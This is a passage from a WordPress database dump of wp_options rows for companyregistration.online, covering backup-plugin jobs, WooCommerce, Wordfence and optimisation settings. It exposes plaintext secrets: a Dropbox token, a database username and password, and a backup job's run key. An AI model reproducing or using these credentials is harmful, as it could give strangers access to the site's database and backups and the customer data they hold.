";}s:10:\"bup_themes\";a:1:{i:0;s:1:\"1\";}s:11:\"bup_uploads\";a:1:{i:0;s:1:\"1\";}s:17:\"bup_extra_folders\";s:0:\"\";s:19:\"bup_uploads_exclude\";a:2:{i:0;s:21:\"backup-wd-logs-3dd56e\";i:1;s:21:\"backup-wd-temp-3dd56e\";}s:20:\"bup_include_specials\";a:1:{i:0;s:1:\"1\";}s:13:\"exclude_types\";s:0:\"\";s:16:\"use_folder_as_wp\";s:0:\"\";s:10:\"folderpath\";s:40:\"wp-content/uploads/backup-wd-{hash_key}/\";s:12:\"folderdelete\";i:15;s:16:\"folderdeletesync\";s:1:\"1\";s:12:\"gdrivefolder\";s:27:\"companyregistration.online/\";s:16:\"gdrivefiledelete\";i:15;s:20:\"gdrivefiledeletesync\";s:1:\"1\";s:9:\"s3service\";s:9:\"us-east-1\";s:11:\"s3accesskey\";s:0:\"\";s:12:\"s3privatekey\";s:0:\"\";s:8:\"s3bucket\";s:0:\"\";s:11:\"s3newbucket\";s:0:\"\";s:14:\"s3bucketfolder\";s:27:\"companyregistration.online/\";s:12:\"s3filedelete\";i:15;s:16:\"s3filedeletesync\";s:1:\"1\";s:13:\"s3multiupload\";s:1:\"1\";s:14:\"s3storageclass\";s:8:\"standard\";s:18:\"s3serverencryption\";s:1:\"1\";s:9:\"dboxtoken\";s:64:\"dNt82TUkNB4AAAAAAAAyynMtC0C2WV3XBlrty-4-B_r5s58IIRLUm8oziADyLot1\";s:8:\"dboxtype\";s:7:\"sandbox\";s:10:\"dboxfolder\";s:27:\"companyregistration.online/\";s:14:\"dboxfiledelete\";i:5;s:18:\"dboxfiledeletesync\";a:1:{i:0;s:1:\"1\";}s:9:\"azurename\";s:0:\"\";s:8:\"azurekey\";s:0:\"\";s:12:\"azurenewcont\";s:0:\"\";s:11:\"azurefolder\";s:27:\"companyregistration.online/\";s:15:\"azurefiledelete\";i:15;s:19:\"azurefiledeletesync\";s:1:\"1\";s:7:\"rscuser\";s:0:\"\";s:6:\"rsckey\";s:0:\"\";s:9:\"rscregion\";s:3:\"DFW\";s:12:\"rsccontainer\";s:0:\"\";s:10:\"rscnewcont\";s:0:\"\";s:9:\"rscfolder\";s:27:\"companyregistration.online/\";s:13:\"rscfiledelete\";i:15;s:17:\"rscfiledeletesync\";s:1:\"1\";s:9:\"ftpserver\";s:0:\"\";s:7:\"ftpport\";i:21;s:7:\"ftpuser\";s:0:\"\";s:7:\"ftppass\";s:0:\"\";s:9:\"ftpfolder\";s:27:\"companyregistration.online/\";s:13:\"ftpfiledelete\";i:15;s:10:\"ftptimeout\";i:90;s:6:\"ftpssl\";s:0:\"\";s:8:\"ftppmode\";s:1:\"1\";s:10:\"sugartoken\";s:0:\"\";s:9:\"sugaruser\";s:0:\"\";s:15:\"sugarsyncfolder\";s:0:\"\";s:11:\"sugarfolder\";s:27:\"companyregistration.online/\";s:15:\"sugarfiledelete\";i:15;s:14:\"glacier_region\";s:9:\"us-east-1\";s:17:\"glacier_accesskey\";s:0:\"\";s:18:\"glacier_privatekey\";s:0:\"\";s:16:\"glacier_newvault\";s:0:\"\";s:18:\"glacier_filedelete\";i:15;s:10:\"send_email\";s:0:\"\";s:6:\"job_id\";i:5;s:15:\"cron_expression\";s:9:\"0 0 * * 0\";s:12:\"schedulelink\";s:65:\"https://companyregistration.online/?rest_route=/buwd/v1/job/5/run\";s:3:\"day\";s:0:\"\";s:11:\"scheduleday\";s:0:\"\";s:12:\"schedulehour\";s:2:\"00\";s:14:\"scheduleminute\";s:2:\"00\";s:12:\"dbtables_all\";a:1:{i:0;s:3:\"all\";}s:10:\"db_encrypt\";a:1:{i:0;s:1:\"1\";}s:16:\"bup_root_exclude\";s:0:\"\";s:18:\"bup_themes_exclude\";a:7:{i:0;s:10:\"responsive\";i:1;s:28:\"responsive-childtheme-master\";i:2;s:10:\"storefront\";i:3;s:13:\"twentyfifteen\";i:4;s:14:\"twentyfourteen\";i:5;s:15:\"twentyseventeen\";i:6;s:13:\"twentysixteen\";}s:18:\"bup_thumbs_exclude\";s:0:\"\";s:8:\"dboxauth\";i:1;s:11:\"dboxsandbox\";s:0:\"\";s:11:\"dboxdropbox\";s:0:\"\";}i:6;a:83:{s:4:\"name\";s:7:\"New Job\";s:4:\"type\";a:2:{i:0;s:2:\"db\";i:1;s:5:\"files\";}s:11:\"destination\";a:1:{i:0;s:6:\"folder\";}s:11:\"backup_type\";s:4:\"sync\";s:12:\"archive_name\";s:37:\"backupwd_{hash_key}_%Y-%m-%d_%H-%i-%s\";s:14:\"archive_format\";s:3:\"tar\";s:8:\"schedule\";s:8:\"manually\";s:12:\"scheduletype\";s:5:\"basic\";s:13:\"schedulemonth\";a:13:{i:0;s:3:\"any\";i:1;s:1:\"1\";i:2;s:1:\"2\";i:3;s:1:\"3\";i:4;s:1:\"4\";i:5;s:1:\"5\";i:6;s:1:\"6\";i:7;s:1:\"7\";i:8;s:1:\"8\";i:9;s:1:\"9\";i:10;s:2:\"10\";i:11;s:2:\"11\";i:12;s:2:\"12\";}s:12:\"scheduleweek\";a:1:{i:0;s:1:\"1\";}s:8:\"dbtables\";a:58:{i:0;s:18:\"wp_cf_form_entries\";i:1;s:21:\"wp_cf_form_entry_meta\";i:2;s:23:\"wp_cf_form_entry_values\";i:3;s:11:\"wp_cf_forms\";i:4;s:14:\"wp_cf_tracking\";i:5;s:19:\"wp_cf_tracking_meta\";i:6;s:14:\"wp_commentmeta\";i:7;s:11:\"wp_comments\";i:8;s:22:\"wp_duplicator_packages\";i:9;s:17:\"wp_et_bloom_stats\";i:10;s:29:\"wp_et_divi_ab_testing_clients\";i:11;s:27:\"wp_et_divi_ab_testing_stats\";i:12;s:12:\"wp_formmaker\";i:13;s:19:\"wp_formmaker_backup\";i:14;s:20:\"wp_formmaker_blocked\";i:15;s:28:\"wp_formmaker_display_options\";i:16;s:18:\"wp_formmaker_query\";i:17;s:21:\"wp_formmaker_sessions\";i:18;s:20:\"wp_formmaker_submits\";i:19;s:19:\"wp_formmaker_themes\";i:20;s:18:\"wp_formmaker_views\";i:21;s:8:\"wp_links\";i:22;s:25:\"wp_nextend2_image_storage\";i:23;s:27:\"wp_nextend2_section_storage\";i:24;s:35:\"wp_nextend2_smartslider3_generators\";i:25;s:32:\"wp_nextend2_smartslider3_sliders\";i:26;s:37:\"wp_nextend2_smartslider3_sliders_xref\";i:27;s:31:\"wp_nextend2_smartslider3_slides\";i:28;s:10:\"wp_options\";i:29;s:11:\"wp_postmeta\";i:30;s:8:\"wp_posts\";i:31;s:21:\"wp_term_relationships\";i:32;s:16:\"wp_term_taxonomy\";i:33;s:11:\"wp_termmeta\";i:34;s:8:\"wp_terms\";i:35;s:15:\"wp_ufbl_entries\";i:36;s:13:\"wp_ufbl_forms\";i:37;s:11:\"wp_usermeta\";i:38;s:8:\"wp_users\";i:39;s:18:\"wp_wc_download_log\";i:40;s:14:\"wp_wc_webhooks\";i:41;s:23:\"wp_woocommerce_api_keys\";i:42;s:35:\"wp_woocommerce_attribute_taxonomies\";i:43;s:47:\"wp_woocommerce_downloadable_product_permissions\";i:44;s:18:\"wp_woocommerce_log\";i:45;s:29:\"wp_woocommerce_order_itemmeta\";i:46;s:26:\"wp_woocommerce_order_items\";i:47;s:32:\"wp_woocommerce_payment_tokenmeta\";i:48;s:29:\"wp_woocommerce_payment_tokens\";i:49;s:23:\"wp_woocommerce_sessions\";i:50;s:38:\"wp_woocommerce_shipping_zone_locations\";i:51;s:36:\"wp_woocommerce_shipping_zone_methods\";i:52;s:29:\"wp_woocommerce_shipping_zones\";i:53;s:33:\"wp_woocommerce_tax_rate_locations\";i:54;s:24:\"wp_woocommerce_tax_rates\";i:55;s:24:\"wp_wr_contactform_fields\";i:56;s:28:\"wp_wr_contactform_form_pages\";i:57;s:33:\"wp_wr_contactform_submission_data\";}s:10:\"dbfilename\";s:12:\"smepubli_wp4\";s:17:\"use_wp_connection\";a:1:{i:0;s:1:\"1\";}s:10:\"dbfilecomp\";s:4:\"none\";s:7:\"db_host\";s:0:\"\";s:7:\"db_user\";s:6:\"nazeer\";s:11:\"db_password\";s:24:\"UblS02PhsyWFVoiyLau4Rabz\";s:7:\"db_name\";s:12:\"smepubli_wp4\";s:8:\"bup_root\";s:0:\"\";s:11:\"bup_content\";s:0:\"\";s:19:\"bup_content_exclude\";a:2:{i:0;s:5:\"cache\";i:1;s:7:\"upgrade\";}s:11:\"bup_plugins\";a:1:{i:0;s:1:\"1\";}s:19:\"bup_plugins_exclude\";a:1:{i:0;s:9:\"backup-wd\";}s:10:\"bup_themes\";a:1:{i:0;s:1:\"1\";}s:11:\"bup_uploads\";a:1:{i:0;s:1:\"1\";}s:17:\"bup_extra_folders\";s:0:\"\";s:19:\"bup_uploads_exclude\";a:2:{i:0;s:21:\"backup-wd-logs-3dd56e\";i:1;s:21:\"backup-wd-temp-3dd56e\";}s:20:\"bup_include_specials\";a:1:{i:0;s:1:\"1\";}s:13:\"exclude_types\";s:0:\"\";s:16:\"use_folder_as_wp\";s:0:\"\";s:10:\"folderpath\";s:40:\"wp-content/uploads/backup-wd-{hash_key}/\";s:12:\"folderdelete\";i:15;s:16:\"folderdeletesync\";a:1:{i:0;s:1:\"1\";}s:9:\"s3service\";s:9:\"us-east-1\";s:11:\"s3accesskey\";s:0:\"\";s:12:\"s3privatekey\";s:0:\"\";s:8:\"s3bucket\";s:0:\"\";s:11:\"s3newbucket\";s:0:\"\";s:14:\"s3bucketfolder\";s:27:\"companyregistration.online/\";s:12:\"s3filedelete\";i:15;s:16:\"s3filedeletesync\";s:1:\"1\";s:13:\"s3multiupload\";s:1:\"1\";s:14:\"s3storageclass\";s:8:\"standard\";s:18:\"s3serverencryption\";s:1:\"1\";s:12:\"gdrivefolder\";s:27:\"companyregistration.online/\";s:16:\"gdrivefiledelete\";i:15;s:20:\"gdrivefiledeletesync\";s:1:\"1\";s:9:\"dboxtoken\";a:0:{}s:8:\"dboxtype\";s:7:\"sandbox\";s:10:\"dboxfolder\";s:27:\"companyregistration.online/\";s:14:\"dboxfiledelete\";i:15;s:18:\"dboxfiledeletesync\";a:1:{i:0;s:1:\"1\";}s:9:\"azurename\";s:0:\"\";s:8:\"azurekey\";s:0:\"\";s:12:\"azurenewcont\";s:0:\"\";s:11:\"azurefolder\";s:27:\"companyregistration.online/\";s:15:\"azurefiledelete\";i:15;s:19:\"azurefiledeletesync\";s:1:\"1\";s:9:\"ftpserver\";s:0:\"\";s:7:\"ftpport\";i:21;s:7:\"ftpuser\";s:0:\"\";s:7:\"ftppass\";s:0:\"\";s:9:\"ftpfolder\";s:27:\"companyregistration.online/\";s:13:\"ftpfiledelete\";i:15;s:10:\"ftptimeout\";i:90;s:6:\"ftpssl\";s:0:\"\";s:8:\"ftppmode\";s:1:\"1\";s:10:\"send_email\";s:0:\"\";s:6:\"job_id\";i:6;s:15:\"cron_expression\";s:9:\"0 0 1 * *\";s:12:\"schedulelink\";s:65:\"https://companyregistration.online/?rest_route=/buwd/v1/job/6/run\";s:3:\"day\";s:0:\"\";s:11:\"scheduleday\";s:0:\"\";s:12:\"schedulehour\";s:2:\"00\";s:14:\"scheduleminute\";s:2:\"00\";s:12:\"dbtables_all\";s:0:\"\";s:10:\"db_encrypt\";s:0:\"\";s:16:\"bup_root_exclude\";s:0:\"\";s:18:\"bup_themes_exclude\";s:0:\"\";s:18:\"bup_thumbs_exclude\";s:0:\"\";s:8:\"dboxauth\";i:0;s:11:\"dboxsandbox\";s:0:\"\";s:11:\"dboxdropbox\";s:0:\"\";}}','no'),(322963,'buwd_job_maxid','6','no'),(322968,'buwd_admin_notice','a:1:{s:15:\"two_week_review\";a:2:{s:5:\"start\";s:10:\"11/28/2017\";s:3:\"int\";i:14;}}','yes'),(322976,'buwd_job_running','1','no'),(322984,'buwd_subscribe_done','1','yes'),(323142,'wcj_add_to_cart_redirect_per_product_enabled','no','yes'),(323143,'wcj_add_to_cart_variable_as_radio_enabled','no','yes'),(323144,'wcj_add_to_cart_variable_as_radio_variation_label_template','%variation_title% (%variation_price%)','yes'),(323145,'wcj_add_to_cart_variable_as_radio_variation_desc_template','<br><small>%variation_description%</small>','yes'),(323146,'wcj_add_to_cart_variable_as_radio_input_td_style','width:10%;','yes'),(323147,'wcj_add_to_cart_replace_loop_w_single_enabled','no','yes'),(323148,'wcj_add_to_cart_quantity_disable','no','yes'),(323149,'wcj_add_to_cart_quantity_disable_cart','no','yes'),(323150,'wcj_add_to_cart_button_per_product_enabled','no','yes'),(323151,'wcj_add_to_cart_button_disable_archives','no','yes'),(323152,'wcj_add_to_cart_button_disable_single','no','yes'),(323153,'wcj_add_to_cart_button_custom_loop_url_per_product_enabled','no','yes'),(323154,'wcj_add_to_cart_button_ajax_per_product_enabled','no','yes'),(323155,'wcj_add_to_cart_button_external_open_new_window_single','no','yes'),(323156,'wcj_add_to_cart_button_external_open_new_window_loop','no','yes'),(323157,'wcj_product_add_to_cart_message_continue_shopping_enabled','no','yes'),(323158,'wcj_product_add_to_cart_message_continue_shopping_text','Continue shopping','yes'),(323159,'wcj_product_add_to_cart_message_view_cart_enabled','no','yes'),(323160,'wcj_product_add_to_cart_message_view_cart_text','View basket','yes'),(331163,'backwpup_cfg_hash','75b9b9','no'),(331164,'backwpup_jobs','a:1:{i:1;a:14:{s:5:\"jobid\";i:1;s:10:\"backuptype\";s:7:\"archive\";s:4:\"type\";a:3:{i:0;s:6:\"DBDUMP\";i:1;s:4:\"FILE\";i:2;s:8:\"WPPLUGIN\";}s:12:\"destinations\";a:1:{i:0;s:6:\"FOLDER\";}s:4:\"name\";s:6:\"Backup\";s:14:\"mailaddresslog\";s:31:\"info@companyregistration.online\";s:20:\"mailaddresssenderlog\";s:69:\"BackWPup companyregistration.online <info@companyregistration.online>\";s:13:\"mailerroronly\";b:1;s:13:\"archiveformat\";s:4:\".zip\";s:11:\"archivename\";s:24:\"%Y-%m-%d_%H-%i-%s_%hash%\";s:7:\"lastrun\";i:1513590701;s:7:\"logfile\";s:126:\"/home/digit626/companyregistration.online/wp-content/uploads/backwpup-75b9b9-logs/backwpup_log_75b9b9_2017-12-18_09-51-41.html\";s:21:\"lastbackupdownloadurl\";s:144:\"https://companyregistration.online/wp-admin/admin.php?page=backwpupbackups&action=downloadfolder&file=2017-12-18_09-51-41_BR23TOMM01.zip&jobid=1\";s:11:\"lastruntime\";i:4276;}}','no'),(331165,'backwpup_version','3.5.0','no'),(331166,'backwpup_cfg_showadminbar','','no'),(331167,'backwpup_cfg_showfoldersize','','no'),(331168,'backwpup_cfg_protectfolders','1','no'),(331169,'backwpup_cfg_jobmaxexecutiontime','30','no'),(331170,'backwpup_cfg_jobstepretry','3','no'),(331171,'backwpup_cfg_jobrunauthkey','7d5dbee1','no'),(331172,'backwpup_cfg_loglevel','normal_translated','no'),(331173,'backwpup_cfg_jobwaittimems','0','no'),(331174,'backwpup_cfg_jobdooutput','0','no'),(331175,'backwpup_cfg_windows','0','no'),(331176,'backwpup_cfg_maxlogs','30','no'),(331177,'backwpup_cfg_gzlogs','0','no'),(331178,'backwpup_cfg_logfolder','uploads/backwpup-75b9b9-logs/','no'),(331179,'backwpup_cfg_httpauthuser','','no'),(331180,'backwpup_cfg_httpauthpassword','','no'),(331182,'backwpup_message_id_en','I5SXIICCMFRWWV2QOVYCAUCSJ4QHO2LUNAQHEZLTORXXEZJAMZ2W4Y3UNFXW4YLMNF2HS7DIOR2HA4Z2F4XWEYLDNN3XA5LQFZRW63JPH52XI3K7ONXXK4TDMU6UEYLDNNLVA5LQEZ2XI3K7MNQW24DBNFTW4PKCMFRWWV2QOVYFEZLTORXXEZJTGATHK5DNL5WWKZDJOVWT2QLENVUW4TTPORUWGZJDMJ2XS7D4','no'),(331183,'backwpup_message_content_en','You want to restore your website at the click of a button? Get BackWPup PRO 3.5 with the long-desired restore functionality now! From May 16th to 31, you get every licence with a 30% discount!','no'),(331184,'backwpup_message_button_text_en','Get BackWPup PRO with restore functionality','no'),(331185,'backwpup_message_url_en','https://backwpup.com/?utm_source=BackWPup&utm_campaign=BackWPupRestore30&utm_medium=AdminNotice#buy','no'),(331186,'backwpup_message_id_es','J5RHJQ5JNYQEEYLDNNLVA5LQEBIFETZAMNXW4IDMMEQGM5LOMNUW63TBNRUWIYLEEBSGKIDSMVZXIYLVOJQWG2ODWNXHY2DUORYHGORPF5RGCY3LO5YHK4BOMNXW2LZ7OV2G2X3TN52XEY3FHVBGCY3LK5IHK4BGOV2G2X3DMFWXAYLJM5XD2QTBMNVVOUDVOBJGK43UN5ZGKMZQEZ2XI3K7NVSWI2LVNU6UCZDNNFXE433UNFRWKI3COV4XY7D4','no'),(331187,'backwpup_message_content_es','¿Quieres restaurar tu web con un sólo click? ¡Obtén BackWPup PRO 3.5 con la largamente esperada funcionalidad de recuperación ahora! ¡Del 16 al 31 de mayo obtén 30% de descuento con cada licencia!','no'),(331188,'backwpup_message_button_text_es','Obtén BackWPup PRO con la funcionalidad de restauración','no'),(331189,'backwpup_message_url_es','https://backwpup.com/?utm_source=BackWPup&utm_campaign=BackWPupRestore30&utm_medium=AdminNotice#buy','no'),(331190,'backwpup_message_id_fr','J5RHIZLOMV5CAQTBMNVVOUDVOAQFAUSPEBQXMZLDEBWGCIDGN5XGG5DJN5XG4YLMNF2MHKJAMRSSA4TFON2GC5LSMF2GS33OPRUHI5DQOM5C6L3CMFRWW53QOVYC4Y3PNUXT65LUNVPXG33VOJRWKPKCMFRWWV2QOVYCM5LUNVPWGYLNOBQWSZ3OHVBGCY3LK5IHK4CSMVZXI33SMUZTAJTVORWV63LFMRUXK3J5IFSG22LOJZXXI2LDMURWE5LZ','no'),(331191,'backwpup_message_content_fr','Souhaitez-vous restaurer votre site internet en cliquant sur un bouton? Obtenez BackWPup PRO 3.5 avec la fonctionnalité de restauration souhaitée depuis longtemps! Du 16 au 31 mai, vous obtiendrez chaque licence avec une réduction de 30%!','no'),(331192,'backwpup_message_button_text_fr','Obtenez BackWPup PRO avec la fonctionnalité de restauration','no'),(331193,'backwpup_message_url_fr','https://backwpup.com/?utm_source=BackWPup&utm_campaign=BackWPupRestore30&utm_medium=AdminNotice#buy','no'),(331194,'backwpup_message_id_de','IJQWG22XKB2XAICQKJHSA3LJOQQFEZLTORXXEZJAIZ2W423UNFXW4IDIN5WGK3T4NB2HI4DTHIXS6YTBMNVXO4DVOAXGIZJPH52XI3K7ONXXK4TDMU6UEYLDNNLVA5LQEZ2XI3K7MNQW24DBNFTW4PKCMFRWWV2QOVYFEZLTORXXEZJTGATHK5DNL5WWKZDJOVWT2QLENVUW4TTPORUWGZJDMJ2XS7D4','no'),(331195,'backwpup_message_content_de','Du willst deine Webseite auf Knopfdruck wiederherstellen können? Dann hole dir jetzt BackWPup PRO 3.5 mit der lang ersehnten Restore Funktion! Vom 16. Mai bis zum 31. Mai erhältst du jede Lizenz 30% günstiger!','no'),(331196,'backwpup_message_button_text_de','BackWPup PRO mit Restore Funktion holen','no'),(331197,'backwpup_message_url_de','https://backwpup.de/?utm_source=BackWPup&utm_campaign=BackWPupRestore30&utm_medium=AdminNotice#buy','no'),(331203,'backwpup_messages','a:0:{}','no'),(333557,'backwpup_message_id_it','IFRXC5LJON2GCICCMFRWWV2QOVYCAUCSJ4QGG33OEBWGCIDGOVXHU2LPNZQWY2LUYOQCAZDJEBZGS4DSNFZXI2LON56GQ5DUOBZTULZPMJQWG23XOB2XALTDN5WS6P3VORWV643POVZGGZJ5IJQWG22XKB2XAJTVORWV6Y3BNVYGC2LHNY6UEYLDNNLVA5LQKJSXG5DPOJSTGMBGOV2G2X3NMVSGS5LNHVAWI3LJNZHG65DJMNSSGYTVPF6HY7D4','no'),(333558,'backwpup_message_content_it','Vuoi ripristinare il tuo sito web con un semplice click? Scarica subito BackWPup PRO 3.5 con la tanto attesa funzionalità di ripristino finalmente disponibile! Dal 16 al 31 maggio, tutte le versioni sono in offerta con uno sconto del 30%!','no'),(333559,'backwpup_message_button_text_it','Acquista BackWPup PRO con la funzionalità di ripristino','no'),(333560,'backwpup_message_url_it','https://backwpup.com/?utm_source=BackWPup&utm_campaign=BackWPupRestore30&utm_medium=AdminNotice#buy','no'),(361661,'current_theme_supports_woocommerce','yes','yes'),(361662,'woocommerce_queue_flush_rewrite_rules','no','yes'),(361666,'default_product_cat','170','yes'),(362600,'woocommerce_thumbnail_image_width','400','yes'),(362601,'woocommerce_thumbnail_cropping','1:1','yes'),(362602,'woocommerce_single_image_width','510','yes'),(362704,'new_admin_email','info@companyregistration.online','yes'),(363044,'woocommerce_customer_on_hold_order_settings','a:4:{s:7:\"enabled\";s:3:\"yes\";s:7:\"subject\";s:0:\"\";s:7:\"heading\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";}','yes'),(364853,'woocommerce_maybe_regenerate_images_hash','a2e8fb7afadab17b6a610ee9d2e96d00','yes'),(365611,'ossdl_https','0','yes'),(369625,'woocommerce_erasure_request_removes_order_data','no','no'),(369626,'woocommerce_erasure_request_removes_download_data','no','no'),(369627,'wpxb_page_for_privacy_policy','295','yes'),(369628,'woocommerce_registration_privacy_policy_text','Your personal data will be used to support your experience throughout this website, to manage access to your account, and for other purposes described in our [privacy_policy].','yes'),(369629,'woocommerce_checkout_privacy_policy_text','Your personal data will be used to process your order, support your experience throughout this website, and for other purposes described in our [privacy_policy].','yes'),(369630,'woocommerce_delete_inactive_accounts','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(369631,'woocommerce_trash_pending_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(369632,'woocommerce_trash_failed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(369633,'woocommerce_trash_cancelled_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(369634,'woocommerce_anonymize_completed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(369635,'woocommerce_checkout_highlight_required_fields','yes','yes'),(373840,'Woo_floating_minicart_position','floating-right','yes'),(373841,'Woo_floating_minicart_offset','30','yes'),(373842,'Woo_floating_minicart_primary_color','#44f438','yes'),(373843,'Woo_floating_minicart_secondary_color','','yes'),(373844,'Woo_floating_minicart_button_color','','yes'),(373845,'Woo_floating_minicart_show_shop_page_link','no','yes'),(373846,'Woo_floating_minicart_show_best_selling_products','no','yes'),(373847,'Woo_floating_minicart_hide','yes','yes'),(382529,'WPLANG','en_GB','yes'),(386615,'updraftcentral_dbversion','0.7.4','yes'),(386657,'updraft_cf_login','','yes'),(386658,'updraft_cf_pass','','yes'),(386659,'updraft_s3_login','','yes'),(386660,'updraft_s3_pass','','yes'),(386661,'updraft_ftp_login','','yes'),(386662,'updraft_ftp_pass','','yes'),(386663,'updraft_cf_remote_path','','yes'),(386664,'updraft_s3_remote_path','','yes'),(386665,'updraft_ftp_remote_path','','yes'),(386666,'updraft_server_address','','yes'),(386667,'updraft_email_complete','1','yes'),(391256,'woocommerce_placeholder_image','31298','yes'),(391259,'woocommerce_admin_notice_woocommerce_google_analytics_pro_notice','<strong>Get detailed insights into your sales with Google Analytics Pro</strong><br><br>Add advanced tracking for your sales funnel, coupons and more. [<a href=\"https://woocommerce.com/products/woocommerce-google-analytics-pro/?utm_source=product&amp;utm_medium=upsell&amp;utm_campaign=google%20analytics%20free%20to%20pro%20extension%20upsell\" target=\"_blank\">Learn more</a> &gt;]','yes'),(391260,'woocommerce_google_analytics_pro_notice_shown','1','yes'),(392337,'ai1wm_updater','a:1:{s:43:\"all-in-one-wp-migration-unlimited-extension\";a:13:{s:4:\"name\";s:19:\"Unlimited Extension\";s:4:\"slug\";s:19:\"unlimited-extension\";s:8:\"homepage\";s:49:\"https://servmask.com/products/unlimited-extension\";s:13:\"download_link\";s:29:\"https://servmask.com/purchase\";s:7:\"version\";s:4:\"2.31\";s:6:\"author\";s:8:\"ServMask\";s:15:\"author_homepage\";s:20:\"https://servmask.com\";s:8:\"sections\";a:1:{s:11:\"description\";s:323:\"<ul class=\"description\"><li>Remove the import limit of 512MB</li><li>Lifetime license with lifetime updates</li><li>Use on any number of websites that you own</li><li>Backup scheduler with hourly, daily, and weekly options</li><li>Unlimited Extension included</li><li>WP CLI commands</li><li>Premium support</li></ul><br />\";}s:7:\"banners\";a:2:{s:3:\"low\";s:65:\"https://servmask.com/img/products/unlimited-extension-772x250.png\";s:4:\"high\";s:66:\"https://servmask.com/img/products/unlimited-extension-1544x500.png\";}s:5:\"icons\";a:3:{s:2:\"1x\";s:65:\"https://servmask.com/img/products/unlimited-extension-128x128.png\";s:2:\"2x\";s:65:\"https://servmask.com/img/products/unlimited-extension-256x256.png\";s:7:\"default\";s:65:\"https://servmask.com/img/products/unlimited-extension-256x256.png\";}s:6:\"rating\";i:99;s:11:\"num_ratings\";i:309;s:10:\"downloaded\";i:40188;}}','yes'),(392470,'wp-optimize-schedule','true','yes'),(392471,'wp-optimize-last-optimized','Never','yes'),(392472,'wp-optimize-schedule-type','wpo_fortnightly','yes'),(392473,'wp-optimize-retention-enabled','true','yes'),(392474,'wp-optimize-retention-period','2','yes'),(392475,'wp-optimize-enable-admin-menu','false','yes'),(392476,'wp-optimize-total-cleaned','3557138','yes'),(392477,'wp-optimize-auto','a:7:{s:6:\"drafts\";s:4:\"true\";s:9:\"transient\";s:4:\"true\";s:8:\"optimize\";s:4:\"true\";s:5:\"trash\";s:4:\"true\";s:10:\"unapproved\";s:4:\"true\";s:9:\"revisions\";s:4:\"true\";s:5:\"spams\";s:4:\"true\";}','yes'),(392478,'wp-optimize-settings','a:13:{s:11:\"user-drafts\";s:5:\"false\";s:13:\"user-postmeta\";s:5:\"false\";s:14:\"user-transient\";s:5:\"false\";s:15:\"user-trackbacks\";s:5:\"false\";s:13:\"user-optimize\";s:4:\"true\";s:10:\"user-trash\";s:4:\"true\";s:16:\"user-commentmeta\";s:5:\"false\";s:15:\"user-orphandata\";s:5:\"false\";s:15:\"user-unapproved\";s:5:\"false\";s:14:\"user-pingbacks\";s:5:\"false\";s:14:\"user-revisions\";s:4:\"true\";s:10:\"user-spams\";s:4:\"true\";s:13:\"last_saved_in\";s:5:\"3.0.4\";}','yes'),(392484,'wp-optimize-enable-auto-backup','false','yes'),(392505,'wp-optimize-logging','','yes'),(392506,'wp-optimize-logging-additional','','yes'),(392507,'wp-optimize-enable-db-force-optimize','false','yes'),(392614,'wp-optimize-corrupted-tables-count','0','yes'),(400830,'show_comments_cookies_opt_in','0','yes'),(409330,'et_bfb_settings','a:1:{s:10:\"enable_bfb\";s:3:\"off\";}','yes'),(412938,'can_compress_scripts','0','no'),(416164,'et_support_site_id','*xo(@O%cgwS^zR=b#j1e','yes'),(416165,'et_safe_mode_plugins_whitelist','a:6:{i:0;s:27:\"ari-adminer/ari-adminer.php\";i:1;s:15:\"etdev/etdev.php\";i:2;s:29:\"divi-builder/divi-builder.php\";i:3;s:31:\"query-monitor/query-monitor.php\";i:4;s:27:\"woocommerce/woocommerce.php\";i:5;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";}','yes'),(418428,'wordfence_version','7.4.0','yes'),(418429,'wordfence_case','1','yes'),(418430,'wordfence_installed','1','yes'),(418431,'wordfenceActivated','1','yes'),(418432,'wf_plugin_act_error','','yes'),(418849,'wordfence_syncAttackDataAttempts','0','no'),(418850,'wordfence_syncingAttackData','0','no'),(418852,'wordfence_lastSyncAttackData','1567052477','no'),(420629,'updraft_task_manager_dbversion','1.1','yes'),(424354,'woocommerce_allow_bulk_remove_personal_data','no','no'),(424355,'woocommerce_allow_tracking','no','no'),(424356,'woocommerce_show_marketplace_suggestions','yes','no'),(424374,'bewpi_debug_settings','a:1:{s:16:\"bewpi_mpdf_debug\";i:0;}','yes'),(424448,'recovery_keys','a:0:{}','yes'),(424967,'wordfence_ls_version','1.0.3','yes'),(425039,'woocommerce_marketplace_suggestions','a:2:{s:11:\"suggestions\";a:26:{i:0;a:4:{s:4:\"slug\";s:28:\"product-edit-meta-tab-header\";s:7:\"context\";s:28:\"product-edit-meta-tab-header\";s:5:\"title\";s:22:\"Recommended extensions\";s:13:\"allow-dismiss\";b:0;}i:1;a:6:{s:4:\"slug\";s:39:\"product-edit-meta-tab-footer-browse-all\";s:7:\"context\";s:28:\"product-edit-meta-tab-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:2;a:9:{s:4:\"slug\";s:46:\"product-edit-mailchimp-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-mailchimp\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:117:\"https://woocommerce.com/wp-content/plugins/wccom-plugins//marketplace-suggestions/icons/mailchimp-for-memberships.svg\";s:5:\"title\";s:25:\"Mailchimp for Memberships\";s:4:\"copy\";s:79:\"Completely automate your email lists by syncing membership changes to Mailchimp\";s:11:\"button-text\";s:10:\"Learn 